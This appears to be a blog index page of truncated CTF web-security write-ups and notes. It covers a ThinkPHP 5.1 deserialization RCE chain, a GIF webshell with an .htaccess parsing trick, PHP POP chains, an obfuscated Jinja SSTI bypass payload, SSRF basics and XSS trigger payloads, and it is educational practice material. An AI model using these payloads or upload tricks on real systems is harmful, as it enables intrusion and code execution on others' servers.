ThinkPHP5 Deserialization Vulnerability Reproduction
1. ThinkPHP 5.1.x deserialization chain
Window object __destruct -> removeFiles() calls file_exists() on a Pivot object -> Conversion object's __toString -> toJson() -> toArray() -> [$relation->visible($name), where $relation is a Request object, so its __call is invoked] -> call_user_func_array with the controlled hook variable reaches isAjax() -> param() -> input() (parameters controllable) -> filterValue() -> call_user_func fully controllable, giving RCE
poc:
<?php
namespace think;
abstract class Model
{
    protected $append = [];
    private $dat ...
SCTF-web
Directory scanning found robots.txt:
User-agent: *
Disallow: /issues/gantt
Disallow: /issues/calendar
Disallow: /activity
Disallow: /search
Disallow: /issues?sort=
Disallow: /issues?query_id=
Disallow: /issues?*set_filter=
Disallow: /issues/*.pdf$
Disallow: /projects/*.pdf$
Disallow: /login
Disallow: /account/register
Disallow: /account/lost_password
admin admin123456
2024 Great Wall Cup
2024 Great Wall Cup - writeup
WEB
sqlup
Start by fuzzing.
Filtered: --+, #, select, and, or
Entering admin with password 1 got in??? (The fuzzy matching in the source actually means you can log in with the password %%.)
Clicking the avatar reveals a file upload point.
The letter p is filtered, so .php files cannot be uploaded; a normal .gif file uploads fine.
So we can craft a GIF image webshell.
After uploading, opening the image link gives us the image's directory:
http://eci-2ze5wzpsckex64sy7i6f.cloudeci1.ichunqiu.com/uploads/2.gif
How do we make use of the image webshell? A .htaccess file can change how files are parsed.
Upload a .htaccess file containing: SetHandler application/x-httpd-php
That way every file is parsed as PHP code.
(AntSword cannot open the /flag file; use the tac command to display it!)
candyshop [unsolved]
{'csrf_token': '04d9a3ecee8267e5ce21f9377e99fd425144aa5f', 'identity': 'guest', ' ...
BaseCTF-web-wp
BaseCTF-web
[Week2] ez_ser source code + PoC
<?php
highlight_file(__FILE__);
error_reporting(0);
class re{
    public $chu0;
    public function __toString(){
        if(!isset($this->chu0)){
            return "I can not believes!";
        }
        $this->chu0->$nononono;#3 chu0=new pwn()
    }
}
class web {#5
    public $kw;
    public $dt;
    pu ...
ssti
SSTI practice
1. DASCTF August: Trueman
Flask template injection; parameter 4 has the injection point.
Filtered: . _ \ [ ] " and various keywords
The tool https://github.com/Marven11/Fenjing bypasses this WAF directly.
The generated payload is:
{%set hd='OS'|lower%}{%set rz=lipsum|escape|batch(22)|first|last%}{%set gl=rz*2~'g''lobals'~rz*2%}{%set ge=rz*2~'g''etitem'~rz*2%}{%set bu=rz*2~'builtins'~rz*2%}{%set im=rz*2~'import'~rz*2%}{{(((((cycler|attr('next')|attr ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick Start
Create a new post
$ hexo new "My New Post"
More info: Writing
Run server
$ hexo server
More info: Server
Generate static files
$ hexo generate
More info: Generating
Deploy to remote sites
$ hexo deploy
More info: Deployment
SSRF vulnerability
1. Background
NAT
SSRF: Server Side Request Forgery
NAT: Network Address Translation
Static NAT: translates an internal IP address to a public IP address
NAT port mapping: through firewall NAT, a private IP:port can be mapped to a public IP:port for access
The curl function trio
curl_init: initializes a curl session; the URL is usually passed here, but it can also be set as an option via curl_setopt
curl_setopt: sets options on the curl session, e.g. CURLOPT_HEADER, where 0 means the header information is output as part of the data stream
CURLOPT_RETURNTRANSFER, 1 returns the data fetched by curl_exec() as a stream instead of outputting it directly.
curl_exec: executes the curl session
curl_close: closes the curl session
2. How SSRF works
SSRF: Server Side Request Forgery
The targets are internal systems that cannot be reached from the external network.
Cause: the server offers functionality that fetches data from other applications on behalf of the client.
Attack methods:
3. Pseudo-protocol information gathering
s ...
7.15 practice
[MRCTF2020]Ezpop
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);#1 $var=p ...
7.13 practice
[NewStarCTF Open Track] UnserializeOne
<?php
error_reporting(0);
highlight_file(__FILE__);
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274
class Start{
    public $name;
    protected $func;
    public function __destruct()#12 __destruct() is called when an object is destroyed
    {
        echo "Welcome to NewStarCTF, ".$this->name;#11 __toString() is called automatically here
    }
    public ...
XSS vulnerability
XSS (cross-site scripting) vulnerability
1. Common trigger tags
Without filtering
1. <script>
<script>alert("xss");</script>
2. <img>: fires when the image fails to load
<img src="x" onerror=alert(1)>
<img src="1" onerror=eval("alert('xss')")>
The handler can also be changed to onmouseover="alert(1)" or onmouseout="alert(1)"
3. <a>
<a href="https://www.qq.com">qq</a>
<a href=javascript:alert('xss')>test</a>  This is not an event-triggered action, so it needs the javascript: prefix
<a href="javascript:a" onm ...